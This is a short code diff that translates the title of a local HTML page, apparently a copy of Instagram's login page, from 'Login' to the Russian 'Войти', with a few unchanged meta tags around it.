--- a/test/index.html
+++ b/test/index.html
@@ -4,7 +4,7 @@
 <meta http-equiv="content-type" content="text/html; charset=utf-8">
         <meta http-equiv="X-UA-Compatible" content="IE=edge">
 
-        <title>Login • Instagram</title>
+        <title>Войти • Instagram</title>
 
         <meta name="apple-mobile-web-app-status-bar-style" content="default">
         <meta name="mobile-web-app-capable" content="yes">
